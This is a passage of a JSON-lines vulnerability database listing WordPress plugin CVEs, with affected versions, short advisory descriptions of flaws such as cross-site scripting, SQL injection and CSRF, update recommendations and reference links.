version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sassy-social-share\\\/tags\\\/3.3.75\\\/public\\\/class-sassy-social-share-public.php#L1481\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sassy-social-share\\\/tags\\\/3.3.75\\\/public\\\/class-sassy-social-share-public.php#L1481\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/99e922ec-d40a-47e7-a10f-d966a351d182?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/99e922ec-d40a-47e7-a10f-d966a351d182?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11252","slug":"sassy-social-share","versionImpact":"3.3.69","versionEndExcluding":"3.3.70","description":"The Social Sharing Plugin \u2013 Sassy Social Share plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the heateor_mastodon_share parameter in all versions up to, and including, 3.3.69 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.3.70, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sassy-social-share\\\/tags\\\/3.3.69\\\/public\\\/class-sassy-social-share-public.php#L1478\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sassy-social-share\\\/tags\\\/3.3.69\\\/public\\\/class-sassy-social-share-public.php#L1478\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sassy-social-share\\\/tags\\\/3.3.69\\\/public\\\/class-sassy-social-share-public.php#L1481\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sassy-social-share\\\/tags\\\/3.3.69\\\/public\\\/class-sassy-social-share-public.php#L1481\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d065c2a-da7d-469a-b57d-f2fd5b760ff4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d065c2a-da7d-469a-b57d-f2fd5b760ff4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2252","slug":"easy-digital-downloads","versionImpact":"3.3.6.1","versionEndExcluding":"3.3.7","description":"The Easy Digital Downloads \u2013 eCommerce Payments and Subscriptions made easy plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.3.6.1 via the edd_ajax_get_download_title() function. This makes it possible for unauthenticated attackers to extract private post titles of downloads. The impact here is minimal.","recommendation":"Update to version 3.3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-digital-downloads\\\/tags\\\/3.3.6.1\\\/includes\\\/ajax-functions.php#L459\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-digital-downloads\\\/tags\\\/3.3.6.1\\\/includes\\\/ajax-functions.php#L459\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-digital-downloads\\\/tags\\\/3.3.6.1\\\/includes\\\/ajax-functions.php#L466\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-digital-downloads\\\/tags\\\/3.3.6.1\\\/includes\\\/ajax-functions.php#L466\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257409\\\/easy-digital-downloads\\\/trunk\\\/includes\\\/ajax-functions.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257409\\\/easy-digital-downloads\\\/trunk\\\/includes\\\/ajax-functions.php?contextall=1\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257409\\\/easy-digital-downloads\\\/trunk\\\/includes\\\/ajax-functions.php?old=3226442&old_path=easy-digital-downloads%2Ftrunk%2Fincludes%2Fajax-functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257409\\\/easy-digital-downloads\\\/trunk\\\/includes\\\/ajax-functions.php?old=3226442&old_path=easy-digital-downloads%2Ftrunk%2Fincludes%2Fajax-functions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e0e3b81-55fe-46b2-bae1-d7321d74c485?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e0e3b81-55fe-46b2-bae1-d7321d74c485?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4924","slug":"sassy-social-share","versionImpact":"3.3.62","versionEndExcluding":"3.3.63","description":"The Social Sharing Plugin  WordPress plugin before 3.3.63 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 3.3.63, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1867505f-d112-4919-9fd5-01745aa0433e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1867505f-d112-4919-9fd5-01745aa0433e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1450","slug":"chaty","versionImpact":"3.3.5","versionEndExcluding":"3.3.6","description":"The Floating Chat Widget: Contact Chat Icons, Telegram Chat, Line Messenger, WeChat, Email, SMS, Call Button, WhatsApp \u2013 Chaty plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018data-hover\u2019 parameter in all versions up to, and including, 3.3.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chaty\\\/tags\\\/3.3.4\\\/js\\\/cht-front-script.js#L389\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chaty\\\/tags\\\/3.3.4\\\/js\\\/cht-front-script.js#L389\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chaty\\\/tags\\\/3.3.5\\\/js\\\/cht-front-script.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chaty\\\/tags\\\/3.3.5\\\/js\\\/cht-front-script.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246336\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246336\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a87d0966-3fd4-46f8-acd5-1cf0cb18af42?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a87d0966-3fd4-46f8-acd5-1cf0cb18af42?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6447","slug":"eventprime-event-calendar-management","versionImpact":"3.3.5","versionEndExcluding":"3.3.6","description":"The EventPrime WordPress plugin before 3.3.6 lacks authentication and authorization, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id\/event name.","recommendation":"Update to version 3.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e366881c-d21e-4063-a945-95e6b080a373\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e366881c-d21e-4063-a945-95e6b080a373\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3662","slug":"fancybox-for-wordpress","versionImpact":"3.3.5","versionEndExcluding":"3.3.6","description":"The FancyBox for WordPress plugin before 3.3.6 does not escape captions and titles attributes before using them to populate galleries' caption fields. The issue was received as a Contributor+ Stored XSS, however one of our researcher (Marc Montpas) escalated it to an Unauthenticated Stored XSS","recommendation":"Update to version 3.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4cda12f0-3c23-44ad-80ea-db2443ebcf82\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4cda12f0-3c23-44ad-80ea-db2443ebcf82\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4cda12f0-3c23-44ad-80ea-db2443ebcf82\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4cda12f0-3c23-44ad-80ea-db2443ebcf82\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1122","slug":"wp-event-solution","versionImpact":"3.3.50","versionEndExcluding":"3.3.51","description":"The Event Manager, Events Calendar, Events Tickets for WooCommerce \u2013 Eventin plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the export_data() function in all versions up to, and including, 3.3.50. This makes it possible for unauthenticated attackers to export event data.","recommendation":"Update to version 3.3.51, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0cbdf679-1657-4249-a433-8fe0cddd94be?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0cbdf679-1657-4249-a433-8fe0cddd94be?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3033231\\\/wp-event-solution\\\/tags\\\/3.3.51\\\/core\\\/admin\\\/hooks.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3033231\\\/wp-event-solution\\\/tags\\\/3.3.51\\\/core\\\/admin\\\/hooks.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3774","slug":"wise-chat","versionImpact":"3.3.4","versionEndExcluding":"3.3.5","description":"The Wise Chat plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the X-Forwarded-For header in all versions up to, and including, 3.3.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wise-chat\\\/tags\\\/3.3.3\\\/src\\\/admin\\\/WiseChatKicksTab.php#L11\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wise-chat\\\/tags\\\/3.3.3\\\/src\\\/admin\\\/WiseChatKicksTab.php#L11\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34fd5045-cd38-4eab-9e97-98f1e3d7423a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34fd5045-cd38-4eab-9e97-98f1e3d7423a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13481","slug":"ltl-freight-quotes-rl-edition","versionImpact":"3.3.4","versionEndExcluding":"3.3.5","description":"The LTL Freight Quotes \u2013 R+L Carriers Edition plugin for WordPress is vulnerable to SQL Injection via the 'edit_id' and 'dropship_edit_id' parameters in all versions up to, and including, 3.3.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3241903\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3241903\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0f3cdce-e239-4c2f-83e3-e8d0b528d39e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0f3cdce-e239-4c2f-83e3-e8d0b528d39e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9654","slug":"easy-digital-downloads","versionImpact":"3.3.4","versionEndExcluding":"3.3.5","description":"The Easy Digital Downloads plugin for WordPress is vulnerable to Improper Authorization in versions 3.1 through 3.3.4. This is due to a lack of sufficient validation checks within the 'verify_guest_email' function to ensure the requesting user is the intended recipient of the purchase receipt. This makes it possible for unauthenticated attackers to bypass intended security restrictions and view the receipts of other users, which contains a link to download paid content. Successful exploitation requires knowledge of another customers email address as well as the file ID of the content they purchased.","recommendation":"Update to version 3.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188001\\\/easy-digital-downloads\\\/trunk\\\/includes\\\/blocks\\\/includes\\\/orders\\\/functions.php?old=2990247&old_path=easy-digital-downloads%2Ftrunk%2Fincludes%2Fblocks%2Fincludes%2Forders%2Ffunctions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188001\\\/easy-digital-downloads\\\/trunk\\\/includes\\\/blocks\\\/includes\\\/orders\\\/functions.php?old=2990247&old_path=easy-digital-downloads%2Ftrunk%2Fincludes%2Fblocks%2Fincludes%2Forders%2Ffunctions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3f4de75-abf5-46e8-854d-be91ed74a5f3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3f4de75-abf5-46e8-854d-be91ed74a5f3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12771","slug":"ecommerce-product-catalog","versionImpact":"3.3.43","versionEndExcluding":"3.3.44","description":"The eCommerce Product Catalog Plugin for WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.3.43. This is due to missing or incorrect nonce validation on the 'customer_panel_password_reset' function. This makes it possible for unauthenticated attackers to reset the password of any administrator or customer account via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.3.44, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ecommerce-product-catalog\\\/trunk\\\/modules\\\/cart\\\/includes\\\/customers\\\/includes\\\/transactions\\\/customer-panel.php#L108\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ecommerce-product-catalog\\\/trunk\\\/modules\\\/cart\\\/includes\\\/customers\\\/includes\\\/transactions\\\/customer-panel.php#L108\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ecommerce-product-catalog\\\/trunk\\\/modules\\\/cart\\\/includes\\\/customers\\\/includes\\\/transactions\\\/customer-panel.php#L44\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ecommerce-product-catalog\\\/trunk\\\/modules\\\/cart\\\/includes\\\/customers\\\/includes\\\/transactions\\\/customer-panel.php#L44\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210939\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210939\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3513ec24-0b1b-4528-9f89-eee5654e4e98?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3513ec24-0b1b-4528-9f89-eee5654e4e98?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7291","slug":"jetformbuilder","versionImpact":"3.3.4.1","versionEndExcluding":"3.3.4.2","description":"The JetFormBuilder plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 3.3.4.1. This is due to improper restriction on user meta fields. This makes it possible for authenticated attackers, with administrator-level and above permissions, to register as super-admins on the sites configured as multi-sites.","recommendation":"Update to version 3.3.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d8ea1c2-7c6e-43b3-97ca-a06438d51d11?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d8ea1c2-7c6e-43b3-97ca-a06438d51d11?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jetformbuilder\\\/tags\\\/3.3.4.1\\\/includes\\\/actions\\\/types\\\/register-user.php#L220\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jetformbuilder\\\/tags\\\/3.3.4.1\\\/includes\\\/actions\\\/types\\\/register-user.php#L220\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jetformbuilder\\\/tags\\\/3.3.4.1\\\/includes\\\/actions\\\/methods\\\/update-user\\\/user-meta-property.php#L23\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jetformbuilder\\\/tags\\\/3.3.4.1\\\/includes\\\/actions\\\/methods\\\/update-user\\\/user-meta-property.php#L23\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-2439","slug":"easy-digital-downloads","versionImpact":"3.3.3","versionEndExcluding":"3.3.4","description":"The Easy Digital Downloads \u2013 Simple eCommerce for Selling Digital Files plugin for WordPress is vulnerable to deserialization of untrusted input via the 'upload[file]' parameter in versions up to, and including 3.3.3. This makes it possible for authenticated administrative users to call files using a PHAR wrapper, that will deserialize and call arbitrary PHP Objects that can be used to perform a variety of malicious actions granted a POP chain is also present.","recommendation":"Update to version 3.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/644c8702-08ad-4048-ae91-041f1771f1dc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/644c8702-08ad-4048-ae91-041f1771f1dc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3154854\\\/easy-digital-downloads\\\/tags\\\/3.3.4\\\/includes\\\/admin\\\/import\\\/import-functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3154854\\\/easy-digital-downloads\\\/tags\\\/3.3.4\\\/includes\\\/admin\\\/import\\\/import-functions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3154854\\\/easy-digital-downloads\\\/tags\\\/3.3.4\\\/src\\\/Utils\\\/FileSystem.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3154854\\\/easy-digital-downloads\\\/tags\\\/3.3.4\\\/src\\\/Utils\\\/FileSystem.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10785","slug":"kadence-blocks","versionImpact":"3.3.3","versionEndExcluding":"3.3.4","description":"The Gutenberg Blocks with AI by Kadence WP \u2013 Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Countdown' widget in all versions up to, and including, 3.3.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3186749%40kadence-blocks&new=3186749%40kadence-blocks&sfp_email=&sfph_mail=#file11\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3186749%40kadence-blocks&new=3186749%40kadence-blocks&sfp_email=&sfph_mail=#file11\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40acd95e-9afd-4c84-b19a-a45117c0fcde?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40acd95e-9afd-4c84-b19a-a45117c0fcde?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4971","slug":"sassy-social-share","versionImpact":"3.3.3","versionEndExcluding":"3.3.4","description":"The Sassy Social Share plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'urls' parameter called via the 'heateor_sss_sharing_count' AJAX action in versions up to, and including, 3.3.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85277960-2bba-4cd7-9f4c-e04f6743b96c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85277960-2bba-4cd7-9f4c-e04f6743b96c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4631519b-2060-43a0-b69b-b3d7ed94c705\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4631519b-2060-43a0-b69b-b3d7ed94c705\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13613","slug":"wise-chat","versionImpact":"3.3.2","versionEndExcluding":"3.3.4","description":"The Wise Chat plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.3.3 via the 'uploads' directory. This makes it possible for unauthenticated attackers to extract sensitive data stored insecurely in the \/wp-content\/uploads directory which can contain file attachments included in chat messages. The vulnerability was partially patched in version 3.3.3.","recommendation":"Update to version 3.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wise-chat\\\/trunk\\\/src\\\/services\\\/WiseChatAttachmentsService.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wise-chat\\\/trunk\\\/src\\\/services\\\/WiseChatAttachmentsService.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268074\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268074\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3288680\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3288680\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f70dabb4-3ae6-43cf-86e2-62ac1454b697?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f70dabb4-3ae6-43cf-86e2-62ac1454b697?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11429","slug":"stars-testimonials-with-slider-and-masonry-grid","versionImpact":"3.3.3","versionEndExcluding":"3.3.4","description":"The Free Responsive Testimonials, Social Proof Reviews, and Customer Reviews \u2013 Stars Testimonials plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.3.3 via the 'stars-testimonials-with-slider-and-masonry-grid' shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary PHP files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where PHP files can be uploaded and included.","recommendation":"Update to version 3.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stars-testimonials-with-slider-and-masonry-grid\\\/tags\\\/3.3.2\\\/plugin.class.php#L1368\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stars-testimonials-with-slider-and-masonry-grid\\\/tags\\\/3.3.2\\\/plugin.class.php#L1368\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stars-testimonials-with-slider-and-masonry-grid\\\/trunk\\\/plugin.class.php#L1368\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stars-testimonials-with-slider-and-masonry-grid\\\/trunk\\\/plugin.class.php#L1368\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68250b6c-22c8-494f-b0b0-62b80cc4de0c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68250b6c-22c8-494f-b0b0-62b80cc4de0c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2918","slug":"ultimate-blocks","versionImpact":"3.3.3","versionEndExcluding":"3.3.4","description":"The Ultimate Blocks \u2013 WordPress Blocks Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widgets in all versions up to, and including, 3.3.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/tags\\\/3.2.9\\\/src\\\/blocks\\\/content-filter\\\/block.php#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/tags\\\/3.2.9\\\/src\\\/blocks\\\/content-filter\\\/block.php#L14\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/tags\\\/3.2.9\\\/src\\\/blocks\\\/content-toggle\\\/block.php#L133\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/tags\\\/3.2.9\\\/src\\\/blocks\\\/content-toggle\\\/block.php#L133\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/tags\\\/3.2.9\\\/src\\\/blocks\\\/how-to\\\/block.php#L335\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/tags\\\/3.2.9\\\/src\\\/blocks\\\/how-to\\\/block.php#L335\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/tags\\\/3.2.9\\\/src\\\/blocks\\\/tabbed-content\\\/block.php#L136\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-blocks\\\/tags\\\/3.2.9\\\/src\\\/blocks\\\/tabbed-content\\\/block.php#L136\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41b2a4cc-fb23-41eb-b1a4-d793ae924d9a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41b2a4cc-fb23-41eb-b1a4-d793ae924d9a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
